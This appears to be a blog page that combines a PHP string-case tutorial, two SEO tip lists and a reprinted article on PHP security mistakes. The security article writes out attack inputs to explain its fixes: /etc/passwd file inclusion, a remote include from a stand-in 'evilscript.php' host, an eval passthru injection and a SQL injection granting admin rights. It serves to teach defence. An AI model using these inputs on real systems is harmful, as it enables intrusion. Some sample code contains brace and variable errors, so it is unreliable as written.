Play with string: String conversion in PHP

Let’s two string

$s=”convert upper case to lower case, lower case to upper case and more!”;

$p=”Convert Case – Convert upper case to lower case, lower case to upper case and more! AccIdentALly left the caPs Lock on and typed something, but can’t be bothered to start again and retype it all?
Simply follow these following easy steps to COnvert your text to exactly how you want it. So, lEt’s try!!”;

And then,

echo strtolower($p);
Output:-
convert case – convert upper case to lower case, lower case to upper case and more! accidentally left the caps lock on and typed something, but can’t be bothered to start again and retype it all? simply follow these following easy steps to convert your text to exactly how you want it. so, let’s try!!

——————————————————-

echo strtoupper($p);
Output:-

CONVERT CASE – CONVERT UPPER CASE TO LOWER CASE, LOWER CASE TO UPPER CASE AND MORE! ACCIDENTALLY LEFT THE CAPS LOCK ON AND TYPED SOMETHING, BUT CAN’T BE BOTHERED TO START AGAIN AND RETYPE IT ALL? SIMPLY FOLLOW THESE FOLLOWING EASY STEPS TO CONVERT YOUR TEXT TO EXACTLY HOW YOU WANT IT. SO, LET’S TRY!!

——————————————————————-
echo ucfirst($s);
Output:-

Convert upper case to lower case, lower case to upper case and more!

————————————————————————–
echo ucwords($s);

Output:-

Convert Upper Case To Lower Case, Lower Case To Upper Case And More!

————————————————————————–
echo strtosentencecase($tp);

Output:-

Convert case – convert upper case to lower case, lower case to upper case and more! Accidentally left the caps lock on and typed something, but can’t be bothered to start again and retype it all? Simply follow these following easy steps to convert your text to exactly how you want it. So, let’s try!!

Function:-

function strtosentencecase($s) {
$str = strtolower($s);
$cap = true;
for($x = 0; $x < strlen($str); $x++){
$letter = substr($str, $x, 1);
if($letter == “.” || $letter == “!” || $letter == “?”){
$cap = true;
}elseif(trim($letter) != “” && $cap == true){
$letter = strtoupper($letter);
$cap = false;
}
$ret .= $letter;
}
return $ret;
}

——————————————————————————

Top 10 SEO Tips for Every Website: Jordan Kasteler

1. Canonical Domain Issues

2. Keyword Research

3. Title Tag Optimization

4. Meta Data

5. Keyword Density

6. On-page keyword Usage (ALT attribute, H tags, body copy, meta data, title, anchor text, images, file/folder names)

7. Sitemaps

8. Crawlability Issues

9. Code Optimization

10. Internal/External Links

1. Canonical Domain Issues – Typically a domain can consist of several different versions such as: http://www.domain.com, domain.com, http://www.domain.com/index.( html | htm | php | asp | jsp | etc). Google can read your WWW and non-WWW as two different versions of your site. The bad thing about this is it triggers a duplicate content filter and then chooses to index only one version. Let’s say Google indexed your non-WWW version, and all of your backlinks went primarily to your WWW version. Well those are wasted backlinks now because they aren’t being passed.

Solution: 301 redirects with a .htaccess file if your site is hosted on an Apache server. A 301 redirect is a “permanent move” of a Webpage. The code below tells bots to redirect the non-WW, index.html, index.htm, and/or index.php to the http://www.domain.com version. Place the following code in a file called .htaccess and put it in your root directory of your site:

Options +FollowSymLinks

RewriteEngine on

RewriteCond %{HTTP_HOST} ^domain.com

RewriteRule ^(.*)$ http://www.domain.com/$1 [R=permanent,L]

RewriteCond %{THE_REQUEST} ^[A-Z]{3,9} /([^/]+/)*index.(htm(l)?|php) HTTP/

RewriteRule ^(([^/]+/)*)index.(htm(l)?|php)$ http://www.domain.com/$1 [R=301,L]

If you’re using an IIS server instead of Apache then do this:

* Open Internet Services Manager, right click on the file or folder you wish to redirect

* Select “a redirection to a URL”

* Enter the Webpage of redirection

* Check “exact URL entered above” and “A permanent redirection for this resource”

* Then “Apply” those settings.

2. Keyword Research – There are a lot of great resources out there for keyword research that I’d like to share. One of my favorites is by Aaron Wall author of SEOBook. His free tool is a compilation of many different keyword research sources ran together to help you find what people are searching for. It can be found at SEOBook.

Overture.com, also known as Yahoo!, has always offered a free keyword selection tool. Overture Keyword suggestion tool

Keyworddiscovery.com and Wordtracker.com have always been the two biggest paid ones. However, Keyword Discovery is currently offering a free keyword search tool. There was a good article in Search Marketing Standard comparing the pros and cons of each. Unfortunately, I have no used Keyword Discovery, but I have been very pleased with Word Tracker. It’s also good for finding those long-tail keywords. In case you are wondering, the long-tail is the 5-7 word longer key phrases that are less popular. A lot of marketers have found it very beneficial to target these large amounts of longer phrases than the few extremely popular ones. I will blog more about this another time.

Incorporating related words and phrasing to your targeted keyword is very important to spiders especially in relation to LSI/A and PaIR. I will blog more about LSI/A and PaIR later, but for now just know that your content should have a related theme to your keyword, and not just be filled with “happy text”. MSN recently released adCenter Labs. There is a tool on here called “Search Result Clustering” which is great for finding related keywords to your main keyword. The caveat is there data is based of their top 10 results for your keyword. MSN ranks sites differently than Google. MSN results tend to favor on-page SEO and Google tends to favor off-page SEO.

3. Title Tag Optimization – Titles should stick around 5-7 words. A lot of people will say that it’s not how many words but its how many characters. I’ve found word-count to be more important. Your title should have your main keyword and then your branding, typically.

For example: Utah Search Engine Optimization | Utah’s SEO Pro

I’ve managed to stick to 7 words, and incorporate my main keywords. Fortunately for me, my branding, “Utah’s SEO Pro”, is also related to my main keyphrase “Utah Search Engine Optimization”. Keywords and branding should be separated in titles with either a dash – or a pipe |. I lean towards pipes since dashes are also used in breaking up words.

4. Meta Data – How many times have you heard someone claiming they know SEO because they know how to construct meta data? I know I have many times. Meta data isn’t half as important as it used to be. I’ve read recently that MSN is the only one who cares about the meta description tag anymore. Even if they don’t matter they’re still good to have because some search engines still use them. Also, meta description is used as the descriptive text in your search engine listing. Here’s an example of proper meta data:

Here are some rules to follow for your meta keyword:

* List keywords in order of most important to least important

* Keep keywords around 250 characters or below. MSN accepts a maximum of 1024.

* Be careful of repeating a keyphrase more than 6 or 7 times

* Don’t use keywords in your meta data that cannot be found on your page’s content

5. Keyword Density – It used to be that people kept a very close watch on the density of keyword in their body content. Typically they kept their keyword density around 2-7%. Now days there is very little weight on the keyword density of your content as long as it’s not overdone or unnatural appearing. They keyword density I’m referring to is in your meta data and title tag. I’m not going to give you an exact rule to follow, but just use common sense for this. Don’t have your title, meta keywords, and meta description all be just your main keyphrase. That’s a 100% density and will raise a red flag.

6. On-page Keyword Usage – There is such thing as over-optimization if you abuse your usage of your main keyphrase. The places you do want to have your keywords and keyphrases are here:

* ALT attributes

* H tags

* Body copy

* Meta data

* Title

* Anchor text

* Images, file, and folder names

ALT attributes can be added to your image tags. They tell spiders and screen readers what that image is about. If possible, use your main keywords to describe the image.

H tags should be set up as a hierarchical tree of headings. Your main header description of your page’s content should be a H1 tag. The H1 tag is the most important and should include your main keywords or keyphrase. Secondary headers should be H2’s, Tertiary should be H3’s, etc.

Body copy should have your main keyphrases used throughout. It’s most important to have them in the first 200 and last 200 words of the content. Extra weight is given to them if they are bolded or italicized. This is an old technique that many SEOs cringe against using, but search engines, especially MSN, still give good weight for it. Like I said before, there is such thing as over-optimization. I wouldn’t bold the main keywords more than 3 times in a typical 750 word page.

Meta data – We’ve discussed this up until now, but to recap, don’t overdo it. Don’t repeat keyphrase more than 6 or 7 times, keep meta keywords to 1024 characters or preferably 250 or below, and don’t add keywords that can’t be found in your content.

Title – We’ve also discussed this as well. Don’t go too far past 7 words and don’t repeat your keywords in your title.

Anchor text is very important for internal and external links. Your anchor text tells crawlers and users what that link is about. It is important to you user main keywords in the anchor text of link to give that particular page or site good ranking for that keyword or keyphrase. When getting backlinks from other people, try to vary your anchor text around your main keyphrase. Too many backlinks with the exact same keyphrase, especially in a short amount of time, will trigger Google’s ‘Google Bomb’ filter.

Images, files, and folder names should also be focused around your main keyphrase. Use dashes (-) when separating words in your naming convention. Dashes tell search engines that the word is separated. Underscores (_) tell search engines to read it as a whole. For example:

Utah-SEO-Pro.jpg will tell a search engine to read “Utah SEO Pro” as the name of that image.

Utah_SEO_Pro.jpg will tell a search engine to read “UtahSEOPro” as the name of the image.

Do you see where your keyphrase can be hurt by using underscores?

7. Sitemaps – Sitemaps are important to search engines and users. My favorite sitemap tool is http://www.xml-sitemaps.com. It will create an XML, ROR, and HTML sitemap for your Website. In addition, it will create a URL list of all your pages to submit to Yahoo! for indexing that can be submitted here http://search.yahoo.com/info/submit.html. The XML map is made especially for Google to submit to their Webmaster tools that can be submitted here http://www.google.com/webmasters/sitemaps/. This is important in telling Google how to crawl your site. MSN, Google, and Yahoo! teamed up to create one generalized protocol for XML sitemaps at http://www.sitemaps.org. It’s nice to seem they playing together on this issue.

8. Crawlability Issues – Never hide your navigation behind Flash, JavaScript, or Images. Always use text for search engines to crawl your navigation. CSS gives your text-based navigation the power of styling similar to using images and the power of roll over similar to JavaScript menus. Spiders have a hard time crawling Flash, and almost impossible time with JavaScript, and they can’t read text that is made from an image (although, Google’s new vector reading patent on images might change that in the future). If you are insistent on having a Flash menu or image-based menu then I suggest creating a text-equivalent alternative in the footer of your site.

If you have a dynamic site then your pages might not be crawlable if they have many parameters. If your URL looked like this for example:

http://www.domain.com/folder/index.php?var=1234&sort=date

Google can typically crawl up to 2 or 3 parameters of your site. It’s best not to risk it though. Any more parameters than 2 or 3 you definitely need to use Mod_Rewrite

Solution:

Mod_Rewrite. Many tools can be found on the internet such as this one: http://www.linkvendor.com/seo-tools/url-rewrite.html. In a (.htaccess) file you can tell your Apache server to write your parameter-based URL to appear as a static URL such as : http://www.domain.com/folder/1234.html instead of http://www.domain.com/folder/index.php?var=1234&sort=date.

9. Code Optimization – CSS layouts have many benefits over table layouts. They lessen your code-to-text ratio and allow spiders to access your content easier without sifting through tons of nested markup. Keep your CSS and JavaScript out of the and in external stylesheets. This reduces your on-page markup and index page’s file size. It also gives a slightly quicker load time. You can use PHP to combine your scripts into one file so it only makes one call to the server. It also can strip out empty space and comments to condense file size. To learn how to do that visit: http://www.ejeliot.com/blog/72.

For table data use the “summary” attribute to tell screen readers (and search engines) what the content in that table is about. Also, use the ALT attribute to describe images. “Longdesc” is a good attribute if you have a longer description of something such as a Flash movie. You can store the description in a completely separate HTML file it will read from.

It’s good practice to keep your code validated. The World Wide Web Consortium offers great code validation tools for XHTML and CSS. Although, Matt Cutts claimed that Google doesn’t care if your code is validated or not other crawlers might. If there’s a code conflict it can halt the spider dead in it’s tracks and may not be able to fully crawl your site.

10. Internal/External Links – Receiving external links from other sites is the #1 item of importance for your rankings. If “content is king” then “linking is queen”. Just keep in mind that pages that link to you should be related to your content. One-way links from sites carry far greater weight than links that are reciprocated. Reciprocal links are a dying practice. Try to keep a good ratio of top-level URL links and deep links. This means don’t get all links going to your http://www.domain.com. Get some links going to the most prominent pages of your Website (i.e. http://www.domain.com/page.html). The reason being is because it looks natural to search engines when someone is linking to something specific, like your internal page, rather than something general like your main domain. There are many variables that determine the weight of the link such as:

· The content of the page that’s linking to you

· Where on the page your link is (within the body content is the best)

· If it’s a directory listing then the higher on the page the better

· The anchor text of the link (should include your keywords)

· The # of outgoing links the page that linking to you currently has

· The relevance and authority of the page that’s linking to you (PageRank is a small determination of that)

· If the site linking to you is blacklisted in search engines or not

Internal links help users find things throughout your site, and help search engines crawl pages better. It’s good practice of information architecture to link to related pages within your content. This will help pass PageRank throughout your site as well.

10 SEO Tips to Remember While Launching a Site: Search Engine Journal

1.) Move JavaScript and CSS Off Page

Moving CSS and JS files off the page does two things. First, it creates cleaner code that is more easily managed. More importantly though, it frees up space that engines consider to be prime real estate. Let’s say a spider lends preferential treatment to content that appears in the first 20KB of a document. If 15KB at the start of your document is verbose JavaScript and CSS coding, you have created an uphill battle from the start…

2.) Code Validity is Key

Always make sure that the final code of your pages can fully validate according to W3C standards. Failure to validate could create accessibility issues — and the engines simply dislike that. They want to push their users out to complete sites that work for everyone.

3.) Browsable Navigation Links

Encapsulating links to internal pages in Flash or JavaScript is dangerous. While some engines can often find links from inside of these coding blocks, it is not guaranteed. Therefore, it is wise to always have an HTML compliant navigational structure. Examples include footer text links, a DHTML menu, etc.

4.) Use a Structured Content Hierarchy

A theme based approach to optimization is the most successful one. Imagine all of the content on your web site to mimic a family tree. Each layer down, there’s more content that fits the overall theme. By nature, the further you drill down — the more specific your content becomes.

5.) URL Construction & Query String URLs

Query strings in URLs are less of a problem today than they once were. Unfortunately, they can still create issues for some engines — and it’s our goal to make the most of the search industry. With this in mind I would recommend that you work with your coding teams to ensure that query strings are kept to a minimum.

6.) Limit Flash Usage

Putting all of your content in a Flash file creates a difficult platform from which to optimize. While it can be done, the results will not come as easily as if Flash was used as a compliment to the rest of the page. Thankfully, with CSS streamlined video on the ‘net, Flash is no longer a necessity. Remember, if you have to use Flash — cut down how much information is in there and fine alternative ways to deliver the content.

7.) Natural Keyword Integration

Repeat after me… “I will not stuff pages with keywords!” Like the engines, I’m tired of seeing web sites that would be great if not for their blatant use of keyword stuffing. Listen up folks… Keyword density and repetition is a thing of the past. Engines are more about off page SEO now, and you need to write clear and concise content that addresses the user. Engines are keen to what makes sense contextually… Don’t try to pull the wool over their eyes.

8.) Local Information Integration

Sounds all technical and precise, but it’s quite simple. If you sell antiques in Tampa Florida, then include that in your site. How? List (in HTML formatted text of course) where you are located. Include a link to Google (or Yahoo) Maps to help hammer home the point. Search is moving to become more focused on users at a local level. Therefore, building sites with this in mind should be a given.

9.) Avoid Duplicate Content

This is pretty self explanatory, and it’s an SEO principal that has been hammered home many times. Why keep on hammering? Because it’s that important! Be sure that you don’t get lazy and copy content from one page to the next. Each page should be specifically targeting one major idea, and the text needs to reflect that. Think you’re at risk? Try something like this free tool allows you to determine the percentage of similarity between any two pages

10.) Launch With the Proper Foundation

Is your new site equipped with a robots.txt file? An XML sitemap? RSS Feeds? Before you launch any new web site you need to run a full QA test to ensure that…

• all pages load properly

• no browser compatibility issues exist

• SEO elements (titles, meta tags, alt tags, etc.) are in place

• spiders can discover all pages

• robots.txt validates

• sitemap.xml(.gz) works

Doing this will really cut down on any potential errors out of the gates, and will put you in a position to succeed.

PHP Security Mistakes : Article from Developer Shed

PHP Security Mistakes

The purpose of this document is to inform PHP programmers of common security mistakes that can be overlooked in PHP scripts. While many of the following concepts may appear to be common sense, they are unfortunately not always common practice. After applying the following practices to your coding, you will be able to eliminate the vast majority of security holes that plague many scripts. Many of these security holes have been found in widely-used open source and commercial PHP scripts in the past.

The most important concept to learn from this article is that you should never trust the user to input exactly what is expected. The way most PHPimage scripts are compromised is by entering unexpected data to exploit security holes inadvertantly left in the script.

Always keep the following principles in mind when designing your scripts:

1. Never include, require, or otherwise open a file with a filename based on user input, without thoroughly checking it first.

Take the following example:

if(isset($page))

{

include($page);

}

Since there is no validation being done on $page, a malicious user could hypothetically call your script like this (assuming register_globals is set to ON):

script.php?page=/etc/passwd

Therefore causing your script to include the servers /etc/passwd file. When a non PHP file is include()’d or require()’d, it’s displayed as HTML/Text, not parsed as PHP code.

On many PHP installations, the include() and require() functions can include remote files. If the malicious user were to call your script like this:

script.php?page=http://mysite.com/evilscript.php

He would be able to have evilscript.php output any PHP code that he or she wanted your script to execute. Imagine if the user sent code to delete content from your database or even send sensitive information directly to the browser.

Solution: validate the input. One method of validation would be to create a list of acceptable pages. If the input did not match any of those pages, an error could be displayed.

$pages = array(‘index.html’, ‘page2.html’, ‘page3.html’);

if( in_array($page, $pages) )

{

include($page);

{

else

{

die(“Nice Try.”);

}

2. Be careful with eval()

Placing user-inputted values into the eval() function can be extremely dangerous. You essentially give the malicious user the ability to execute any command he or she wishes! You may envision the input coming from a drop-down menu of options you specify, but you user may decide to send input like this:

script.phpimage?input=;passthru(“cat /etc/paswd”);

By putting his own code in that statement, the user could cause your program to output your server’s complete /etc/passwd file.

Use eval() sparingly, and by all means, validate the input. It should only be used when absolutely necessary — when there is dynamically generated PHP code. If you are using it to substitute template variables into a string or substitute user-inputted values, then you are using it for the wrong reason. Try sprintf() or a template system instead.

3. Be careful when using register_globals = ON

This has been a major issue since this feature was invented. It was originally designed to make programming in PHP easier (and that it did), but misuse of it often led to security holes. As of PHP 4.2.0, register_globals is set to OFF by default. It is recommended that you use the superglobals to deal with input ($_GET, $_POST, $_COOKIE, $_SESSION, etc).

For example, let us say that you had a variable that specified what page to include:

include($page);

but you intended $page to be defined in a config file or somewhere else in the script, and not to come as user input. In one instance you forgot to pre-define $page. If register_globals is set to ON, the malicious user can take over and define $page for you, by calling your script like this:

script.php?page=http://www.example.com/evilscript.php

I recommend you develop with register_globals set to OFF, and use the superglobals when accessing user input. In addition, you should always develop with full error reporting, which can be specified like this (at the top of your script):

error_reporting(E_ALL);

This way, you will receive a notice for every variable you try to call that was not previously defined. Yes, PHP does not require you to define variables so there may be notices that you can ignore, but this will help you to catch undefined variables that you did expect to come from input or other sources. In the previous example, when $page was referenced in the include() statement, PHP would issue a notice that $page was not defined.

Whether or not you want to use register_globals is up to you, but make sure you are aware of the advantages and disadvantages of it and how to remedy the possible security holes.

4. Never run unescaped queries

PHP has a feature, enabled by default, that automatically escapes (adds a backslash in front of) certain characters that come in from a GET, POST, or COOKIE. The single quote (‘) is one example of a character that is escaped automatically. This is done so that if you include input variables in your SQL queries, it will not treat single quotes as part of the query. Say your user entered $name from a form and you performed this query:

UPDATE users SET Name=’$name’ WHERE ID=1;

Normally, if they had entered $name with single quotes in them, they would be escaped, so MySQL would see this:

UPDATE users SET Name=’Joe\’s’ WHERE ID=1

so that the single quote entered into “Joe’s” would not interfere with the query syntax.

In some situations, you may use stripslashes() on an input variable. If you put the variable into a query, make sure to use addslashes() or mysql_escape_string() to escape the single quotes before your run the query. Imagine if an unslashed query went in, and a malicious user had entered part of a query as their name!

UPDATE users SET Name=’Joe’,Admin=’1′ WHERE ID=1

On the input form, the user would have entered:

Joe’,Admin=’1

As their name, and since the single quotes were not escaped, he or she would be able to actually end the name definition, place in a comma, and set another variable called Admin!

The final query with input in blue would look like this:

UPDATE users SET Name=’Joe’,Admin=’1′ WHERE ID=1

In some configurations, magic_quotes_gpc (the feature that automatically adds slashes to all input) is actually set to OFF. You can use the function get_magic_quotes_gpc() to see if it’s on or not (it returns true or false). If it returns false, simply use addslashes() to add slashes to all of the input (it is easiest if you use $_POST, $_GET, and $_COOKIE or $HTTP_POST_VARS, $HTTP_GET_VARS, and $HTTP_COOKIE_VARS, instead of globals because you could step through those arrays using a foreach() loop and add slashes to each one).

5. For protected areas, use sessions or validate the login every time.

There are some cases where programmers will only use some sort of login.phpimage script to first validate their username and password (entered through a form), test if they’re an administrative or valid user, and actually set a variable through a cookie, or even hide it as a hidden variable. Then in the code, they check to see if they have access like this:

if($admin)

{

// let them in

}

else

{

// kick them out

}

The above a code makes the fatal assumption that the $admin variable can only come from a cookie or input form that the malicious user has no control over. However, that is simply not the case. With register_globals enabled, injecting designed input into the $admin variable is as easy as calling the script like so:

script.php?admin=1

Furthermore, even if you use the superglobals $_COOKIE or $_POST, a malicious user can easily forge a cookie or create his own HTML form to post any information to your script.

There are two good solutions to this problem. One is on the same track as setting an $admin variable, but this time set $admin as a session variable. In this case, it is stored on the server and is much less likely to be forged. On subsequent calls to the same script, your user’s previous session information will be available on the server, and you will be able to verify if the user is an administrator like so:

if( $_SESSION[‘admin’] )

The second solution is to only store their username and password in a cookie, and with every call to the script, validate the username and password and verify if the user is an administrator. You could have two functions — one called validate_login($username,$password) that verified the user’s login information, and one called is_admin($username) that queried the database to see if that username is an administrator. The code would be placed at the top of any protected script:

if( !validate_login( $_COOKIE[‘username’], $_COOKIE[‘password’] ) )

{

echo “Sorry, invalid login”;

exit;

}

// the login is ok if we made it down here

if( !is_admin( $_COOKIE[‘username’] ) )

{

echo “Sorry, you do not have access to this section”;

exit;

}

Personally I recommend using sessions, as the latter solution is not scalable.

6. If you don’t want the file contents to be seen, give the file a .php extension.

It was common practice for awhile to name include files or library files with a .inc extension. Here’s the problem: if a malicious user simply enter the .inc file into his browser, it will be displayed as plain text, not parsed as PHP. Even if the browser did not like the file type, an option to download it would most likely be given. Imagine if this file had your database login and password, or even more sensitive information.

This goes for any other extension other than .php (and a few others), so even a .conf or a .cfg file would not be safe.

The solution is to put a .php extension on the end of it. Since your include files or config files usually just define variables and/or functions and not really output anything, if your user were to load this, for example, into their browser:

http://yoursite.com/lib.inc.php

they would most likely be shown nothing at all, unless of your lib.inc.php outputs something. Either way, the file would be parsed as PHP instead of just displaying your code.

There are also some reports of people adding Apache directives that will deny access to .inc files; however, I do not recommend this because of the lack of portability. If you rely on .inc files and that Apache directive to deny access to them and one day you move your scripts to another server and forget to place the Apache directive in, you are wide open.